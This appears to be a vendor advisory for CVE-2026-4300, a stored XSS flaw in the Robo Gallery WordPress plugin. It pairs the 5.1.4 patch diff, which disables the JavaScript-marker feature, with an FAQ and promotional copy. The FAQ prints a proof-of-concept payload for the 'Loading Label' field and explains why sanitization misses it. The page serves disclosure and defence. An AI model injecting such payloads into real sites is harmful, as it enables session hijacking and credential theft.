* Contact: https://robogallery.co/
--- a/robo-gallery/autoload.php
+++ b/robo-gallery/autoload.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/cmbre2/fields/colums/cmb-field-colums.php
+++ b/robo-gallery/cmbre2/fields/colums/cmb-field-colums.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/cmbre2/fields/rbsgallery/cmb-field-rbsgallery.php
+++ b/robo-gallery/cmbre2/fields/rbsgallery/cmb-field-rbsgallery.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/cmbre2/fields/rbstext/cmb-field-rbstext.php
+++ b/robo-gallery/cmbre2/fields/rbstext/cmb-field-rbstext.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/cmbre2/fields/rbstextarea/cmb-field-rbstextarea.php
+++ b/robo-gallery/cmbre2/fields/rbstextarea/cmb-field-rbstextarea.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/extensions/block/src/init.php
+++ b/robo-gallery/includes/extensions/block/src/init.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/extensions/category/category.class.php
+++ b/robo-gallery/includes/extensions/category/category.class.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/extensions/category/category.init.php
+++ b/robo-gallery/includes/extensions/category/category.init.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/extensions/stats/stats.init.php
+++ b/robo-gallery/includes/extensions/stats/stats.init.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/base-grid/assets.php
+++ b/robo-gallery/includes/frontend/modules/base-grid/assets.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/base-grid/effects.set1.php
+++ b/robo-gallery/includes/frontend/modules/base-grid/effects.set1.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/base-grid/grid/grid.columns.v1.php
+++ b/robo-gallery/includes/frontend/modules/base-grid/grid/grid.columns.v1.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/base-grid/grid/grid.v1.php
+++ b/robo-gallery/includes/frontend/modules/base-grid/grid/grid.v1.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/base-grid/hover.v1.php
+++ b/robo-gallery/includes/frontend/modules/base-grid/hover.v1.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/base-grid/layout.v1.php
+++ b/robo-gallery/includes/frontend/modules/base-grid/layout.v1.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/base-grid/lightbox.php
+++ b/robo-gallery/includes/frontend/modules/base-grid/lightbox.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/base-grid/menu/menu.php
+++ b/robo-gallery/includes/frontend/modules/base-grid/menu/menu.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/base-grid/polaroid.php
+++ b/robo-gallery/includes/frontend/modules/base-grid/polaroid.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/base-grid/resize.php
+++ b/robo-gallery/includes/frontend/modules/base-grid/resize.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/base-grid/search.php
+++ b/robo-gallery/includes/frontend/modules/base-grid/search.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/base-grid/seo.php
+++ b/robo-gallery/includes/frontend/modules/base-grid/seo.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/base-grid/size.php
+++ b/robo-gallery/includes/frontend/modules/base-grid/size.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/base-grid/tags.php
+++ b/robo-gallery/includes/frontend/modules/base-grid/tags.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/abstraction.php
+++ b/robo-gallery/includes/frontend/modules/class/abstraction.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/addtexts.php
+++ b/robo-gallery/includes/frontend/modules/class/addtexts.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/assets.php
+++ b/robo-gallery/includes/frontend/modules/class/assets.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/cache.php
+++ b/robo-gallery/includes/frontend/modules/class/cache.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/cachedb.php
+++ b/robo-gallery/includes/frontend/modules/class/cachedb.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/config.php
+++ b/robo-gallery/includes/frontend/modules/class/config.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/customcss.php
+++ b/robo-gallery/includes/frontend/modules/class/customcss.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/element.php
+++ b/robo-gallery/includes/frontend/modules/class/element.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/jsoptions.php
+++ b/robo-gallery/includes/frontend/modules/class/jsoptions.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
@@ -70,17 +70,17 @@
}
- public function setJsFunction($valName, $funcCode){
- if(is_array($funcCode)){
- if( count($funcCode)){
- foreach ($funcCode as $funcName => $funcCodeCur ) {
- $this->setJsFunction($valName.'/'.$funcName, $funcCodeCur);
- }
- }
- return ;
- }
- $this->setValue($valName, '|***'.$funcCode.'***|');
- }
+ // public function setJsFunction($valName, $funcCode){
+ // if(is_array($funcCode)){
+ // if( count($funcCode)){
+ // foreach ($funcCode as $funcName => $funcCodeCur ) {
+ // $this->setJsFunction($valName.'/'.$funcName, $funcCodeCur);
+ // }
+ // }
+ // return ;
+ // }
+ // $this->setValue($valName, '|***'.$funcCode.'***|');
+ // }
public function setOption( $valName ){
@@ -93,18 +93,18 @@
}
- private static function fixJsFunction( $json ){
- return str_replace(
- array( '"|***', '***|"' ),
- array( '', '' ),
- $json
- );
- }
+ // private static function fixJsFunction( $json ){
+ // return str_replace(
+ // array( '"|***', '***|"' ),
+ // array( '', '' ),
+ // $json
+ // );
+ // }
public function getOptionList(){
$json = json_encode( $this->options, JSON_NUMERIC_CHECK );
- $json = self::fixJsFunction($json);
+ //$json = self::fixJsFunction($json);
return $json;
}
--- a/robo-gallery/includes/frontend/modules/class/loader.php
+++ b/robo-gallery/includes/frontend/modules/class/loader.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/protection.php
+++ b/robo-gallery/includes/frontend/modules/class/protection.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/source/class.source.php
+++ b/robo-gallery/includes/frontend/modules/class/source/class.source.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/source/type/base.php
+++ b/robo-gallery/includes/frontend/modules/class/source/type/base.php
@@ -2,7 +2,7 @@
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/source/type/slider.php
+++ b/robo-gallery/includes/frontend/modules/class/source/type/slider.php
@@ -2,7 +2,7 @@
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/source/type/youtube.php
+++ b/robo-gallery/includes/frontend/modules/class/source/type/youtube.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/class/stats.php
+++ b/robo-gallery/includes/frontend/modules/class/stats.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/core.php
+++ b/robo-gallery/includes/frontend/modules/core.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/init.php
+++ b/robo-gallery/includes/frontend/modules/init.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/robogrid/assets.php
+++ b/robo-gallery/includes/frontend/modules/robogrid/assets.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/robogrid/content.php
+++ b/robo-gallery/includes/frontend/modules/robogrid/content.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/robogrid/layout.php
+++ b/robo-gallery/includes/frontend/modules/robogrid/layout.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/simple/assets.php
+++ b/robo-gallery/includes/frontend/modules/simple/assets.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/simple/content.php
+++ b/robo-gallery/includes/frontend/modules/simple/content.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/simple/layout.php
+++ b/robo-gallery/includes/frontend/modules/simple/layout.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/slider/assets.php
+++ b/robo-gallery/includes/frontend/modules/slider/assets.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/slider/content.php
+++ b/robo-gallery/includes/frontend/modules/slider/content.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/slider/layout.php
+++ b/robo-gallery/includes/frontend/modules/slider/layout.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/modules/slider/options.php
+++ b/robo-gallery/includes/frontend/modules/slider/options.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/rbs_gallery_class.php
+++ b/robo-gallery/includes/frontend/rbs_gallery_class.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/frontend/rbs_gallery_frontend.php
+++ b/robo-gallery/includes/frontend/rbs_gallery_frontend.php
@@ -2,7 +2,7 @@
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/options/cache.php
+++ b/robo-gallery/includes/options/cache.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/options/rbs_gallery_options_copy.php
+++ b/robo-gallery/includes/options/rbs_gallery_options_copy.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/options/rbs_gallery_options_css.php
+++ b/robo-gallery/includes/options/rbs_gallery_options_css.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/rbs_gallery_edit.php
+++ b/robo-gallery/includes/rbs_gallery_edit.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/rbs_gallery_init.php
+++ b/robo-gallery/includes/rbs_gallery_init.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/rbs_gallery_media.php
+++ b/robo-gallery/includes/rbs_gallery_media.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/rbs_gallery_menu.php
+++ b/robo-gallery/includes/rbs_gallery_menu.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/rbs_gallery_settings.php
+++ b/robo-gallery/includes/rbs_gallery_settings.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/rbs_gallery_widget.php
+++ b/robo-gallery/includes/rbs_gallery_widget.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/rbs_gallery_widget_last.php
+++ b/robo-gallery/includes/rbs_gallery_widget_last.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/includes/rbs_hooks.php
+++ b/robo-gallery/includes/rbs_hooks.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/robogallery.php
+++ b/robo-gallery/robogallery.php
@@ -3,7 +3,7 @@
Plugin Name: Robo Gallery
Plugin URI: https://robosoft.co/gallery
Description: Gallery modes photo gallery, images gallery, video gallery, Polaroid gallery, gallery lightbox, portfolio gallery, responsive gallery
-Version: 5.1.3
+Version: 5.1.4
Author: RoboSoft
Author URI: https://robosoft.co/gallery
License: GPLv3 or later
@@ -13,7 +13,7 @@
if( !defined('WPINC') ) die;
-define("ROBO_GALLERY_VERSION", '5.1.3');
+define("ROBO_GALLERY_VERSION", '5.1.4');
define("ROBO_GALLERY", 1 );
Frequently Asked Questions
What is CVE-2026-4300?
Overview of the vulnerabilityCVE-2026-4300 is a stored cross-site scripting (XSS) vulnerability in the Robo Gallery plugin for WordPress, affecting versions up to and including 5.1.3. It allows authenticated users with Author-level access to inject arbitrary JavaScript into gallery pages via the ‘Loading Label’ setting.
How does the vulnerability work?
Mechanism of the attackThe vulnerability arises from the plugin’s use of a custom marker pattern to embed JavaScript in JSON configuration objects. When a user inputs a payload like ‘|***alert(document.domain)***|’, it bypasses sanitization and is executed as JavaScript when the gallery is rendered on the frontend.
Who is affected by this vulnerability?
Identifying affected usersAny WordPress site using the Robo Gallery plugin version 5.1.3 or earlier is affected. Specifically, authenticated users with Author-level permissions can exploit this vulnerability to execute arbitrary JavaScript.
How can I check if my site is vulnerable?
Steps to verify vulnerabilityTo check if your site is vulnerable, verify the version of the Robo Gallery plugin installed. If it is version 5.1.3 or earlier, your site is at risk. Additionally, review any gallery settings for suspicious entries in the ‘Loading Label’ field.
How can I fix CVE-2026-4300?
Updating the pluginTo mitigate this vulnerability, update the Robo Gallery plugin to version 5.1.4 or later, where the issue has been patched. Regularly check for updates to ensure ongoing protection against vulnerabilities.
What does a CVSS score of 6.4 mean?
Understanding the severity ratingA CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk, particularly to sites with user-generated content or where users can log in.
What are the practical risks of this vulnerability?
Potential consequences of exploitationIf exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the context of any user viewing the affected gallery. This could lead to session hijacking, credential theft, or other malicious actions.
What is the proof of concept for this vulnerability?
Demonstration of the exploitThe proof of concept involves creating a gallery with a malicious payload in the ‘Loading Label’ field. When the gallery is viewed, the injected JavaScript executes, demonstrating the vulnerability’s potential impact.
How can I mitigate the risk if I cannot update immediately?
Temporary measures to reduce exposureIf immediate updating is not possible, consider disabling the Robo Gallery plugin or restricting access to Author-level users until the plugin can be updated. Additionally, implement web application firewalls to block potentially malicious input.
What sanitization issues led to this vulnerability?
Understanding the root causeThe vulnerability stems from the plugin’s use of `sanitize_text_field()` for the ‘Loading Label’ field, which strips HTML tags but does not filter out the custom marker pattern. This oversight allows JavaScript payloads to be stored and executed.
Are there any additional security measures recommended?
Best practices for WordPress securityIn addition to updating plugins, regularly review user permissions, implement strong password policies, and use security plugins that monitor for suspicious activity. Consider employing a web application firewall to provide an additional layer of protection.
How can I report any suspicious activity related to this vulnerability?
Steps for responsible disclosureIf you observe any suspicious activity or believe your site has been compromised due to this vulnerability, report it to your hosting provider and consider reaching out to the plugin developers. Document any findings to assist in the investigation.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
